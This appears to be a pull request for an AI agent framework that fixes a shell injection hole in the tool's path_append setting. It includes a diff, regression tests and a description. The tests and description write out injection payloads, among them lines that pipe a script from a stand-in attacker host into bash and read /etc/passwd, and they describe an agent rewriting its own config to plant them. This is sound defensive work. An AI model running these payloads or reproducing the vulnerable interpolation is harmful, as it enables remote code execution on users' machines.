### PR TITLE
fix(security): prevent shell injection via path_append on non-Windows platforms

### DIFF
--- a/nanobot/agent/tools/shell.py
+++ b/nanobot/agent/tools/shell.py
@@ -135,10 +135,7 @@ class ExecTool(Tool):
         env = self._build_env()
 
         if self.path_append:
-            if _IS_WINDOWS:
-                env["PATH"] = env.get("PATH", "") + ";" + self.path_append
-            else:
-                command = f'export PATH="$PATH:{self.path_append}"; {command}'
+            env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
 
         try:
             process = await self._spawn(command, cwd, env)

--- a/nanobot/agent/tools/shell.py
+++ b/nanobot/agent/tools/shell.py
@@ -255,6 +255,7 @@ class ExecTool(Tool):
         home = os.environ.get("HOME", "/tmp")
         env = {
             "HOME": home,
+            "PATH": os.environ.get ("PATH", "/usr/bin:/bin"),
             "LANG": os.environ.get("LANG", "C.UTF-8"),
             "TERM": os.environ.get("TERM", "dumb"),
         }

--- a/nanobot/agent/tools/shell.py
+++ b/nanobot/agent/tools/shell.py
@@ -135,7 +135,11 @@ class ExecTool(Tool):
         env = self._build_env()
 
         if self.path_append:
-            env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
+            if _IS_WINDOWS:
+                env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
+            else:
+                env["NANOBOT_PATH_APPEND"] = self.path_append
+                command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}'
 
         try:
             process = await self._spawn(command, cwd, env)
@@ -255,7 +259,6 @@ class ExecTool(Tool):
         home = os.environ.get("HOME", "/tmp")
         env = {
             "HOME": home,
-            "PATH": os.environ.get ("PATH", "/usr/bin:/bin"),
             "LANG": os.environ.get("LANG", "C.UTF-8"),
             "TERM": os.environ.get("TERM", "dumb"),
         }
@@ -296,8 +299,8 @@ class ExecTool(Tool):
                     continue
 
                 media_path = get_media_dir().resolve()
-                if (p.is_absolute() 
-                    and cwd_path not in p.parents 
+                if (p.is_absolute()
+                    and cwd_path not in p.parents
                     and p != cwd_path
                     and media_path not in p.parents
                     and p != media_path

--- a/tests/tools/test_exec_env.py
+++ b/tests/tools/test_exec_env.py
@@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch):
     tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"])
     result = await tool.execute(command="printenv NONEXISTENT_VAR_12345")
     assert "Exit code: 1" in result
+
+
+# --- path_append injection prevention ------------------------------------
+
+
+@_UNIX_ONLY
+@pytest.mark.asyncio
+@pytest.mark.parametrize(
+    "malicious_path",
+    [
+        # semicolon — classic command separator
+        '/tmp/bin; echo INJECTED',
+        # command substitution via $()
+        '/tmp/bin; echo $(whoami)',
+        # backtick command substitution
+        "/tmp/bin; echo `id`",
+        # pipe to another command
+        '/tmp/bin; cat /etc/passwd',
+        # chained with &&
+        '/tmp/bin && curl http://attacker.com/shell.sh | bash',
+        # newline injection
+        '/tmp/bin\necho INJECTED',
+        # mixed shell metacharacters
+        '/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED',
+    ],
+)
+async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path):
+    """Shell metacharacters in path_append must NOT be interpreted as commands.
+
+    Regression test for: path_append was previously concatenated into a shell
+    command string via f'export PATH="$PATH:{path_append}"; {command}', which
+    allowed shell injection.  After the fix, path_append is passed through the
+    env dict so metacharacters are treated as literal path characters.
+    """
+    tool = ExecTool(path_append=malicious_path)
+    result = await tool.execute(command="echo SAFE_OUTPUT")
+
+    # The original command should succeed
+    assert "SAFE_OUTPUT" in result
+
+    # None of the injected payloads should have produced side-effects
+    assert "INJECTED" not in result
+    assert "root:" not in result  # /etc/passwd content
+
+
+@_UNIX_ONLY
+@pytest.mark.asyncio
+async def test_exec_path_append_command_substitution_does_not_execute(tmp_path):
+    """$() in path_append must not trigger command substitution.
+
+    We create a marker file and try to read it via $(cat ...).  If command
+    substitution works, the marker content appears in output.
+    """
+    marker = tmp_path / "secret_marker.txt"
+    marker.write_text("SHOULD_NOT_APPEAR")
+
+    tool = ExecTool(
+        path_append=f'/tmp/bin; echo $(cat {marker})',
+    )
+    result = await tool.execute(command="echo OK")
+
+    assert "OK" in result
+    assert "SHOULD_NOT_APPEAR" not in result
+
+
+@_UNIX_ONLY
+@pytest.mark.asyncio
+async def test_exec_path_append_legitimate_path_still_works():
+    """A normal, safe path_append value must still be appended to PATH."""
+    tool = ExecTool(path_append="/opt/custom/bin")
+    result = await tool.execute(command="echo $PATH")
+    assert "/opt/custom/bin" in result

--- a/tests/tools/test_exec_platform.py
+++ b/tests/tools/test_exec_platform.py
@@ -165,6 +165,7 @@ class TestPathAppendPlatform:
 
         with (
             patch ("nanobot.agent.tools.shell._IS_WINDOWS", False),
+            patch ("nanobot.agent.tools.shell.os.pathsep", ":"),
             patch.object (ExecTool, "_spawn", side_effect=capture_spawn),
             patch.object (ExecTool, "_guard_command", return_value=None),
         ):

--- a/tests/tools/test_exec_platform.py
+++ b/tests/tools/test_exec_platform.py
@@ -27,7 +27,7 @@ class TestBuildEnvUnix:
     def test_expected_keys(self):
         with patch("nanobot.agent.tools.shell._IS_WINDOWS", False):
             env = ExecTool()._build_env()
-        expected = {"HOME", "LANG", "TERM"}
+        expected = {"HOME", "LANG", "PATH","TERM"}
         assert expected <= set(env)
         if sys.platform != "win32":
             assert set(env) == expected
@@ -148,23 +148,32 @@ class TestSpawnWindows:
 class TestPathAppendPlatform:
 
     @pytest.mark.asyncio
-    async def test_unix_injects_export(self):
-        """On Unix, path_append is an export statement prepended to command."""
-        mock_proc = AsyncMock()
+    async def test_unix_injects_export (self):
+        """On Unix, path_append is passed via the env dict, not shell string."""
+        mock_proc = AsyncMock ()
         mock_proc.communicate.return_value = (b"ok", b"")
         mock_proc.returncode = 0
 
-        with (
-            patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
-            patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn,
-            patch.object(ExecTool, "_guard_command", return_value=None),
-        ):
-            tool = ExecTool(path_append="/opt/bin")
-            await tool.execute(command="ls")
+        captured_cmd = None
+        captured_env = {}
 
-        spawned_cmd = mock_spawn.call_args[0][0]
-        assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd
-        assert spawned_cmd.endswith("ls")
+        async def capture_spawn (cmd, cwd, env):
+            nonlocal captured_cmd
+            captured_cmd = cmd
+            captured_env.update (env)
+            return mock_proc
+
+        with (
+            patch ("nanobot.agent.tools.shell._IS_WINDOWS", False),
+            patch.object (ExecTool, "_spawn", side_effect=capture_spawn),
+            patch.object (ExecTool, "_guard_command", return_value=None),
+        ):
+            tool = ExecTool (path_append="/opt/bin")
+            await tool.execute (command="ls")
+
+        # path_append must be in the env dict, NOT injected into the command
+        assert captured_cmd == "ls"
+        assert captured_env["PATH"].endswith (":/opt/bin")
 
     @pytest.mark.asyncio
     async def test_windows_modifies_env(self):
@@ -181,6 +190,7 @@ class TestPathAppendPlatform:
 
         with (
             patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
+            patch ("nanobot.agent.tools.shell.os.pathsep", ";"),
             patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
             patch.object(ExecTool, "_guard_command", return_value=None),
         ):

--- a/tests/tools/test_exec_platform.py
+++ b/tests/tools/test_exec_platform.py
@@ -27,7 +27,7 @@ class TestBuildEnvUnix:
     def test_expected_keys(self):
         with patch("nanobot.agent.tools.shell._IS_WINDOWS", False):
             env = ExecTool()._build_env()
-        expected = {"HOME", "LANG", "PATH","TERM"}
+        expected = {"HOME", "LANG", "TERM"}
         assert expected <= set(env)
         if sys.platform != "win32":
             assert set(env) == expected
@@ -148,33 +148,33 @@ class TestSpawnWindows:
 class TestPathAppendPlatform:
 
     @pytest.mark.asyncio
-    async def test_unix_injects_export (self):
-        """On Unix, path_append is passed via the env dict, not shell string."""
-        mock_proc = AsyncMock ()
+    async def test_unix_uses_env_var_in_fixed_export(self):
+        """On Unix, path_append must not be interpolated into shell source."""
+        mock_proc = AsyncMock()
         mock_proc.communicate.return_value = (b"ok", b"")
         mock_proc.returncode = 0
 
         captured_cmd = None
         captured_env = {}
 
-        async def capture_spawn (cmd, cwd, env):
+        async def capture_spawn(cmd, cwd, env):
             nonlocal captured_cmd
             captured_cmd = cmd
-            captured_env.update (env)
+            captured_env.update(env)
             return mock_proc
 
         with (
-            patch ("nanobot.agent.tools.shell._IS_WINDOWS", False),
-            patch ("nanobot.agent.tools.shell.os.pathsep", ":"),
-            patch.object (ExecTool, "_spawn", side_effect=capture_spawn),
-            patch.object (ExecTool, "_guard_command", return_value=None),
+            patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
+            patch("nanobot.agent.tools.shell.os.pathsep", ":"),
+            patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
+            patch.object(ExecTool, "_guard_command", return_value=None),
         ):
-            tool = ExecTool (path_append="/opt/bin")
-            await tool.execute (command="ls")
+            tool = ExecTool(path_append="/opt/bin; echo INJECTED")
+            await tool.execute(command="ls")
 
-        # path_append must be in the env dict, NOT injected into the command
-        assert captured_cmd == "ls"
-        assert captured_env["PATH"].endswith (":/opt/bin")
+        assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls'
+        assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED"
+        assert "INJECTED" not in captured_cmd
 
     @pytest.mark.asyncio
     async def test_windows_modifies_env(self):
@@ -191,7 +191,7 @@ class TestPathAppendPlatform:
 
         with (
             patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
-            patch ("nanobot.agent.tools.shell.os.pathsep", ";"),
+            patch("nanobot.agent.tools.shell.os.pathsep", ";"),
             patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
             patch.object(ExecTool, "_guard_command", return_value=None),
         ):


### PR DESCRIPTION

## Summary

Fix a shell injection vulnerability in `ExecTool` where `path_append` was
concatenated into a shell command string on non-Windows platforms, allowing
shell metacharacters to bypass `_guard_command` and execute arbitrary commands.

## Problem

In `nanobot/agent/tools/shell.py:141`, the Linux/macOS branch constructed a
shell command by string interpolation:

```python
command = f'export PATH="$PATH:{self.path_append}"; {command}'
```

Since `_guard_command()` runs **before** this concatenation (line 119), any
shell metacharacters embedded in `path_append` (e.g. `;`, `$()`, backticks,
`&&`) were never inspected by the safety guard.

An attacker who can modify the nanobot configuration (e.g. via the Agent's
own `write_file` tool) could set `path_append` to:

```
 /tmp/bin; curl http://evil.com/shell.sh | bash; echo "
```

This would be interpreted as three separate shell commands, with the middle
one executing arbitrary code — all while `_guard_command` only saw the
original benign `command` value.

## Fix

Pass `path_append` through the **environment variable dict** instead of shell
string interpolation, matching the existing Windows behavior:

```python
# Before (5 lines, vulnerable)
if _IS_WINDOWS:
    env["PATH"] = env.get("PATH", "") + ";" + self.path_append
else:
    command = f'export PATH="$PATH:{self.path_append}"; {command}'

# After (2 lines, safe)
env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
```

Using `os.pathsep` (`:` on Unix, `;` on Windows) ensures cross-platform
correctness. Shell metacharacters in `path_append` are now treated as literal
path characters and never interpreted by the shell.

## Testing

Added 3 new test functions (9 parametrized cases) in
`tests/tools/test_exec_env.py`:

- `test_exec_path_append_shell_metacharacters_not_executed` — 7 parametrized
  payloads (`;`, `$()`, backticks, `|`, `&&`, `\n`, mixed)
- `test_exec_path_append_command_substitution_does_not_execute` — verifies
  `$(cat file)` does not leak file contents
- `test_exec_path_append_legitimate_path_still_works` — regression guard
  that normal path appending still functions